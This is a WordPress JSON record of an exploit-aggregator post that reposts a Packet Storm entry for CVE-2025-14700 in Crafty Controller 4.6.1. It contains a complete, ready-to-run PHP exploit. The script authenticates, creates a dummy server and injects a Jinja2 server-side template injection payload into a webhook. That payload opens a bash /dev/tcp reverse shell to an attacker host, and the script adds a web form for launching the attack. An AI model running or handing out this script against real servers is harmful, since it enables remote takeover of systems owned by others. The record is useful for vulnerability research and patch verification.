{"id":32543,"date":"2025-12-23T11:54:31","date_gmt":"2025-12-23T11:54:31","guid":{"rendered":"http:\/\/localhost\/?p=32543"},"modified":"2025-12-23T11:54:31","modified_gmt":"2025-12-23T11:54:31","slug":"crafty-controller-461-remote-code-execution-server-side-template-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32543","title":{"rendered":"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258"},"content":{"rendered":"

{“lastseen”:”2025-12-23T17:16:15″,”description”:”Crafty Controller version 4.6.1 allows authenticated remote attackers to execute arbitrary system commands on the target server through server-side template injection the webhook configuration feature…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:213258″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-14700″],”sourceData”:”=============================================================================================================================================\\n | # Title : Crafty Controller 4.6.1 authenticated RCE via Server-Side Template Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/craftycontrol.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213042\/ \\u0026 \\tCVE-2025-14700\\n \\n [+] Summary : This PHP script is a complete port of a Python exploit targeting CVE-2025-14700, a critical vulnerability in the Crafty Controller Minecraft server management platform. \\n The exploit chain allows authenticated remote attackers to execute arbitrary system commands on the target server through Server-Side Template Injection (SSTI) in the webhook configuration feature.\\n \\n [+] Exploitation Chain:\\n \\n 1- Authentication Bypass \\u0026 Token Harvesting\\n \\n Retrieves initial XSRF token from login page\\n \\n Authenticates with admin credentials to obtain JWT token\\n \\n Maintains session cookies throughout the attack\\n \\n 2- Server Creation for Payload Delivery\\n \\n Creates a dummy Minecraft server via API\\n \\n Required to access the vulnerable webhook configuration endpoint\\n \\n 3- SSTI Payload Injection\\n \\n Injects malicious Jinja2 template into Discord webhook configuration\\n \\n Uses cycler.__init__.__globals__.os.system() to escape template sandbox\\n \\n Embeds reverse shell command for remote access\\n \\n 4- Triggering the Vulnerability\\n \\n Emulates browser requests to trigger server start action\\n \\n Executes EULA confirmation to initialize the server\\n \\n The template is rendered during server initialization, executing the payload\\n \\n [+] Technical Details:\\n \\n Vulnerable Component: Webhook configuration in \/api\/v2\/servers\/{id}\/webhook\\n \\n Attack Vector: Authenticated SSTI \u2192 RCE\\n \\n Privileges Required: Admin credentials\\n \\n Impact: Full system compromise via reverse shell\\n \\n Default Port: 8443 (HTTPS)\\n \\n \\n [+] CODE : php exploit.php –url=https:\/\/target.com:8443 –login=admin –password=password –lhost=192.168.1.100 –lport=4444\\n \\n \\u003c?php\\n \\n \\n error_reporting(E_ALL);\\n ini_set(‘display_errors’, 1);\\n \\n \/\/ Reverse Shell Template\\n define(‘REVSHELL_TEMPLATE’, \\”bash -c ‘bash -i \\u003e\/dev\/tcp\/%s\/%d 0\\u003c\\u00261 2\\u003e\\u00261’\\”);\\n \\n class CraftyExploit {\\n private $url;\\n private $login;\\n private $password;\\n private $lhost;\\n private $lport;\\n private $session;\\n private $cookies;\\n \\n public function __construct($url, $login, $password, $lhost, $lport) {\\n $this-\\u003eurl = rtrim($url, ‘\/’);\\n $this-\\u003elogin = $login;\\n $this-\\u003epassword = $password;\\n $this-\\u003elhost = $lhost;\\n $this-\\u003elport = $lport;\\n $this-\\u003esession = curl_init();\\n $this-\\u003ecookies = [];\\n \\n \/\/ Configure cURL options\\n curl_setopt($this-\\u003esession, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($this-\\u003esession, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($this-\\u003esession, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($this-\\u003esession, CURLOPT_FOLLOWLOCATION, true);\\n curl_setopt($this-\\u003esession, CURLOPT_HEADER, true);\\n curl_setopt($this-\\u003esession, CURLOPT_USERAGENT, ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’);\\n }\\n \\n private function request($method, $endpoint, $data = null, $headers = [], $returnHeaders = false) {\\n $url = $this-\\u003eurl . $endpoint;\\n \\n curl_setopt($this-\\u003esession, CURLOPT_URL, $url);\\n curl_setopt($this-\\u003esession, CURLOPT_CUSTOMREQUEST, $method);\\n \\n \/\/ Set headers\\n $defaultHeaders = [\\n ‘Accept: application\/json, text\/plain, *\/*’,\\n ‘Accept-Language: en-US,en;q=0.9’,\\n ‘Connection: keep-alive’,\\n ];\\n \\n $allHeaders = array_merge($defaultHeaders, $headers);\\n curl_setopt($this-\\u003esession, CURLOPT_HTTPHEADER, $allHeaders);\\n \\n \/\/ Set cookies if any\\n if (!empty($this-\\u003ecookies)) {\\n $cookieStr = ”;\\n foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n $cookieStr .= \\”$name=$value; \\”;\\n }\\n curl_setopt($this-\\u003esession, CURLOPT_COOKIE, trim($cookieStr));\\n }\\n \\n \/\/ Set POST data\\n if ($method === ‘POST’ \\u0026\\u0026 $data !== null) {\\n if (isset($headers[‘Content-Type’]) \\u0026\\u0026 strpos($headers[‘Content-Type’], ‘application\/json’) !== false) {\\n curl_setopt($this-\\u003esession, CURLOPT_POSTFIELDS, json_encode($data));\\n } else {\\n curl_setopt($this-\\u003esession, CURLOPT_POSTFIELDS, $data);\\n }\\n }\\n \\n $response = curl_exec($this-\\u003esession);\\n \\n if ($response === false) {\\n echo \\”cURL Error: \\” . curl_error($this-\\u003esession) . \\”\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Parse response\\n $headerSize = curl_getinfo($this-\\u003esession, CURLINFO_HEADER_SIZE);\\n $headers = substr($response, 0, $headerSize);\\n $body = substr($response, $headerSize);\\n \\n \/\/ Update cookies from response\\n $this-\\u003eparseCookies($headers);\\n \\n \/\/ Create response object\\n $result = [\\n ‘status_code’ =\\u003e curl_getinfo($this-\\u003esession, CURLINFO_HTTP_CODE),\\n ‘headers’ =\\u003e $headers,\\n ‘body’ =\\u003e $body,\\n ‘request_url’ =\\u003e $url,\\n ‘request_method’ =\\u003e $method\\n ];\\n \\n if ($returnHeaders) {\\n return $result;\\n }\\n \\n return $body;\\n }\\n \\n private function parseCookies($headers) {\\n $lines = explode(\\”\\\\n\\”, $headers);\\n foreach ($lines as $line) {\\n if (stripos($line, ‘Set-Cookie:’) === 0) {\\n $cookie = trim(substr($line, 11));\\n $parts = explode(‘;’, $cookie);\\n $cookiePair = explode(‘=’, $parts[0], 2);\\n if (count($cookiePair) === 2) {\\n $this-\\u003ecookies[$cookiePair[0]] = $cookiePair[1];\\n }\\n }\\n }\\n }\\n \\n private function printDebugInfo($response) {\\n echo \\”\\\\n\\” . str_repeat(\\”=\\”, 80) . \\”\\\\n\\”;\\n echo \\”[{$response[‘request_method’]}] {$response[‘request_url’]} -\\u003e HTTP {$response[‘status_code’]}\\\\n\\”;\\n echo str_repeat(\\”-\\”, 20) . \\” [KEY HEADERS VALIDATION] \\” . str_repeat(\\”-\\”, 20) . \\”\\\\n\\”;\\n \\n \/\/ Important headers to display\\n $importantHeaders = [‘token’, ‘X-XSRFToken’, ‘Authorization’, ‘Cookie’, ‘Referer’, ‘Content-Type’];\\n $headers = $this-\\u003eparseResponseHeaders($response[‘headers’]);\\n \\n foreach ($importantHeaders as $h) {\\n $hLower = strtolower($h);\\n foreach ($headers as $headerName =\\u003e $headerValue) {\\n if (strtolower($headerName) === $hLower) {\\n echo \\”$h: $headerValue\\\\n\\”;\\n break;\\n }\\n }\\n }\\n \\n echo str_repeat(\\”-\\”, 20) . \\” [RESPONSE BODY] \\” . str_repeat(\\”-\\”, 25) . \\”\\\\n\\”;\\n \\n \/\/ Try to decode JSON\\n $json = json_decode($response[‘body’], true);\\n if (json_last_error() === JSON_ERROR_NONE) {\\n echo json_encode($json, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE) . \\”\\\\n\\”;\\n } else {\\n \/\/ Truncate output if it’s not JSON\\n echo (strlen($response[‘body’]) \\u003e 200) ? substr($response[‘body’], 0, 200) . \\”…\\” : $response[‘body’];\\n if (empty($response[‘body’])) {\\n echo \\”(Empty Body)\\”;\\n }\\n echo \\”\\\\n\\”;\\n }\\n \\n echo str_repeat(\\”=\\”, 80) . \\”\\\\n\\\\n\\”;\\n }\\n \\n private function parseResponseHeaders($headers) {\\n $parsed = [];\\n $lines = explode(\\”\\\\n\\”, $headers);\\n foreach ($lines as $line) {\\n if (strpos($line, ‘:’) !== false) {\\n list($name, $value) = explode(‘:’, $line, 2);\\n $parsed[trim($name)] = trim($value);\\n }\\n }\\n return $parsed;\\n }\\n \\n public function apiLogin() {\\n echo \\”[*] STEP 1: Visiting login page to retrieve initial _xsrf cookie…\\\\n\\”;\\n \\n \/\/ Get initial XSRF token\\n $response = $this-\\u003erequest(‘GET’, ‘\/login’, null, [], true);\\n $xsrf = $this-\\u003ecookies[‘_xsrf’] ?? ”;\\n \\n echo \\”[*] STEP 2: Executing authentication (XSRF: \\” . substr($xsrf, 0, 15) . \\”…)\\\\n\\”;\\n \\n $endpoint = ‘\/api\/v2\/auth\/login\/’;\\n $headers = [\\n ‘Content-Type: application\/json’,\\n ‘X-XSRFToken: ‘ . $xsrf,\\n ‘Referer: ‘ . $this-\\u003eurl . ‘\/login?next=%2Fpanel%2Fdashboard’,\\n ‘Origin: ‘ . $this-\\u003eurl\\n ];\\n \\n $data = [\\n ‘username’ =\\u003e $this-\\u003elogin,\\n ‘password’ =\\u003e $this-\\u003epassword\\n ];\\n \\n $response = $this-\\u003erequest(‘POST’, $endpoint, $data, $headers, true);\\n $this-\\u003eprintDebugInfo($response);\\n \\n $responseData = json_decode($response[‘body’], true);\\n \\n if ($response[‘status_code’] == 200 \\u0026\\u0026 \\n isset($responseData[‘status’]) \\u0026\\u0026 \\n $responseData[‘status’] == ‘ok’ \\u0026\\u0026\\n isset($responseData[‘data’][‘token’])) {\\n return $responseData[‘data’][‘token’];\\n }\\n \\n die(\\”[FATAL] Login failed. Please check credentials or target connectivity.\\\\n\\”);\\n }\\n \\n public function createServer($jwtToken) {\\n echo \\”[*] STEP 3: Creating exploit dummy server…\\\\n\\”;\\n \\n $endpoint = ‘\/api\/v2\/servers’;\\n $xsrf = $this-\\u003ecookies[‘_xsrf’] ?? ”;\\n \\n $headers = [\\n ‘Content-Type: application\/json’,\\n ‘Authorization: Bearer ‘ . $jwtToken,\\n ‘X-XSRFToken: ‘ . $xsrf,\\n ‘Referer: ‘ . $this-\\u003eurl . ‘\/panel\/dashboard’\\n ];\\n \\n $data = [\\n ‘name’ =\\u003e ‘CVE_2025_14700_Exploit_Automation’,\\n ‘monitoring_type’ =\\u003e ‘minecraft_java’,\\n ‘minecraft_java_monitoring_data’ =\\u003e [‘host’ =\\u003e ‘127.0.0.1’, ‘port’ =\\u003e 25565],\\n ‘create_type’ =\\u003e ‘minecraft_java’,\\n ‘minecraft_java_create_data’ =\\u003e [\\n ‘create_type’ =\\u003e ‘download_jar’,\\n ‘download_jar_create_data’ =\\u003e [\\n ‘category’ =\\u003e ‘mc_java_servers’,\\n ‘type’ =\\u003e ‘paper’,\\n ‘version’ =\\u003e ‘1.18.2’,\\n ‘mem_min’ =\\u003e 1,\\n ‘mem_max’ =\\u003e 2,\\n ‘server_properties_port’ =\\u003e 25565\\n ]\\n ]\\n ];\\n \\n $response = $this-\\u003erequest(‘POST’, $endpoint, $data, $headers, true);\\n $this-\\u003eprintDebugInfo($response);\\n \\n $responseData = json_decode($response[‘body’], true);\\n \\n if (isset($responseData[‘data’][‘new_server_id’])) {\\n return $responseData[‘data’][‘new_server_id’];\\n }\\n \\n die(\\”[FATAL] Failed to create server.\\\\n\\”);\\n }\\n \\n public function createHook($serverId, $lhost, $lport, $jwtToken) {\\n echo \\”[*] STEP 4: Injecting SSTI Reverse Shell payload…\\\\n\\”;\\n \\n $endpoint = \\”\/api\/v2\/servers\/{$serverId}\/webhook\\”;\\n $xsrf = $this-\\u003ecookies[‘_xsrf’] ?? ”;\\n $revshellCmd = sprintf(REVSHELL_TEMPLATE, $lhost, $lport);\\n \\n \/\/ Jinja2 SSTI payload\\n $payload = ‘{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system(\\”‘ . $revshellCmd . ‘\\”) }}’;\\n \\n $headers = [\\n ‘Content-Type: application\/json’,\\n ‘Authorization: Bearer ‘ . $jwtToken,\\n ‘X-XSRFToken: ‘ . $xsrf,\\n ‘Referer: ‘ . $this-\\u003eurl . ‘\/panel\/dashboard’\\n ];\\n \\n $data = [\\n ‘webhook_type’ =\\u003e ‘Discord’,\\n ‘name’ =\\u003e ‘Exploit_Trigger_Hook’,\\n ‘url’ =\\u003e ‘https:\/\/localhost:8443\/’,\\n ‘bot_name’ =\\u003e ‘Crafty Bot’,\\n ‘trigger’ =\\u003e [‘start_server’],\\n ‘body’ =\\u003e $payload,\\n ‘color’ =\\u003e ‘#c646000’,\\n ‘enabled’ =\\u003e true\\n ];\\n \\n $response = $this-\\u003erequest(‘POST’, $endpoint, $data, $headers, true);\\n $this-\\u003eprintDebugInfo($response);\\n }\\n \\n public function triggerExploit($serverId, $jwtToken) {\\n echo \\”\\\\n[*] STEP 5: Executing protocol-level trigger emulation (Critical Phase)…\\\\n\\”;\\n \\n $xsrf = $this-\\u003ecookies[‘_xsrf’] ?? ”;\\n $host = parse_url($this-\\u003eurl, PHP_URL_HOST);\\n \\n \/\/ Set JWT in cookies\\n $this-\\u003ecookies[‘token’] = $jwtToken;\\n \\n \/\/ 1. Trigger Start Server Action\\n $startUrl = \\”\/api\/v2\/servers\/{$serverId}\/action\/start_server\\”;\\n echo \\”[*] Sending start_server action request…\\\\n\\”;\\n \\n $headers = [\\n ‘token: ‘ . $xsrf,\\n ‘X-XSRFToken: ‘ . $xsrf,\\n ‘X-Requested-With: XMLHttpRequest’,\\n ‘Origin: ‘ . $this-\\u003eurl,\\n ‘Referer: ‘ . $this-\\u003eurl . ‘\/panel\/dashboard’,\\n ‘Accept: *\/*’,\\n ‘Accept-Encoding: gzip, deflate, br’,\\n ‘sec-ch-ua-platform: \\”Windows\\”‘\\n ];\\n \\n $response = $this-\\u003erequest(‘POST’, $startUrl, ”, $headers, true);\\n $this-\\u003eprintDebugInfo($response);\\n \\n sleep(2);\\n \\n \/\/ 2. Trigger EULA Action\\n $eulaUrl = \\”\/api\/v2\/servers\/{$serverId}\/action\/eula\\”;\\n echo \\”[*] Sending EULA confirmation action request…\\\\n\\”;\\n \\n $this-\\u003erequest(‘POST’, $eulaUrl, ”, $headers, false);\\n \\n echo \\”\\\\n[+] POC Execution completed. Check your nc listener ({$this-\\u003elhost}:{$this-\\u003elport}).\\\\n\\”;\\n }\\n \\n public function run() {\\n $jwt = $this-\\u003eapiLogin();\\n $serverId = $this-\\u003ecreateServer($jwt);\\n $this-\\u003ecreateHook($serverId, $this-\\u003elhost, $this-\\u003elport, $jwt);\\n $this-\\u003etriggerExploit($serverId, $jwt);\\n }\\n \\n public function __destruct() {\\n if (is_resource($this-\\u003esession)) {\\n curl_close($this-\\u003esession);\\n }\\n }\\n }\\n \\n \/\/ Command line interface\\n if (PHP_SAPI === ‘cli’) {\\n $options = getopt(‘u:l:p:lh:lp:’, [\\n ‘url:’, ‘login:’, ‘password:’, ‘lhost:’, ‘lport:’\\n ]);\\n \\n $url = $options[‘u’] ?? $options[‘url’] ?? null;\\n $login = $options[‘l’] ?? $options[‘login’] ?? null;\\n $password = $options[‘p’] ?? $options[‘password’] ?? null;\\n $lhost = $options[‘lh’] ?? $options[‘lhost’] ?? null;\\n $lport = $options[‘lp’] ?? $options[‘lport’] ?? null;\\n \\n if (!$url || !$login || !$password || !$lhost || !$lport) {\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -u, –url Target base URL (e.g., https:\/\/10.67.3.77:8443)\\\\n\\”;\\n echo \\” -l, –login Admin username\\\\n\\”;\\n echo \\” -p, –password Admin password\\\\n\\”;\\n echo \\” -lh, –lhost Local listener IP\\\\n\\”;\\n echo \\” -lp, –lport Local listener port\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new CraftyExploit($url, $login, $password, $lhost, (int)$lport);\\n $exploit-\\u003erun();\\n } else {\\n \/\/ Web interface (optional)\\n echo \\”\\u003cpre\\u003e\\”;\\n if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’) {\\n $url = $_POST[‘url’] ?? ”;\\n $login = $_POST[‘login’] ?? ”;\\n $password = $_POST[‘password’] ?? ”;\\n $lhost = $_POST[‘lhost’] ?? ”;\\n $lport = $_POST[‘lport’] ?? ”;\\n \\n if ($url \\u0026\\u0026 $login \\u0026\\u0026 $password \\u0026\\u0026 $lhost \\u0026\\u0026 $lport) {\\n $exploit = new CraftyExploit($url, $login, $password, $lhost, (int)$lport);\\n $exploit-\\u003erun();\\n } else {\\n echo \\”Please fill all fields.\\\\n\\”;\\n }\\n }\\n echo \\”\\u003c\/pre\\u003e\\”;\\n ?\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eCVE-2025-14700 Exploit\\u003c\/title\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch2\\u003eCVE-2025-14700 Exploit Interface\\u003c\/h2\\u003e\\n \\u003cform method=\\”POST\\”\\u003e\\n URL: \\u003cinput type=\\”text\\” name=\\”url\\” size=\\”50\\” placeholder=\\”https:\/\/10.67.3.77:8443\\”\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n Login: \\u003cinput type=\\”text\\” name=\\”login\\”\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n Password: \\u003cinput type=\\”password\\” name=\\”password\\”\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n LHOST: \\u003cinput type=\\”text\\” name=\\”lhost\\” placeholder=\\”192.168.1.100\\”\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n LPORT: \\u003cinput type=\\”text\\” name=\\”lport\\” placeholder=\\”4444\\”\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n \\u003cinput type=\\”submit\\” value=\\”Execute\\”\\u003e\\n \\u003c\/form\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\u003c?php\\n }\\n ?\\u003e\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213258″,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213258\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-23T17:16:15″,”description”:”Crafty Controller version 4.6.1 allows authenticated remote attackers to execute arbitrary system commands on the target server through server-side template injection the webhook configuration feature…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,13,53,7,11,5],"class_list":["post-32543","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32543\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-23T17:16:15″,”description”:”Crafty Controller version 4.6.1 allows authenticated remote attackers to execute arbitrary system commands on the target server through server-side template injection the webhook configuration feature…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32543\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-23T11:54:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \\\/ Server-Side Template Injection_PACKETSTORM:213258\",\"datePublished\":\"2025-12-23T11:54:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543\"},\"wordCount\":2349,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.9\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32543#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543\",\"name\":\"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \\\/ Server-Side Template Injection_PACKETSTORM:213258 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-23T11:54:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32543\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32543#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \\\/ Server-Side Template Injection_PACKETSTORM:213258\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32543","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258 - zero redgem","og_description":"{“lastseen”:”2025-12-23T17:16:15″,”description”:”Crafty Controller version 4.6.1 allows authenticated remote attackers to execute arbitrary system commands on the target server through server-side template injection the webhook configuration feature…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4...","og_url":"https:\/\/zero.redgem.net\/?p=32543","og_site_name":"zero redgem","article_published_time":"2025-12-23T11:54:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32543#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32543"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258","datePublished":"2025-12-23T11:54:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32543"},"wordCount":2349,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.9","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32543#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32543","url":"https:\/\/zero.redgem.net\/?p=32543","name":"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258 - zero 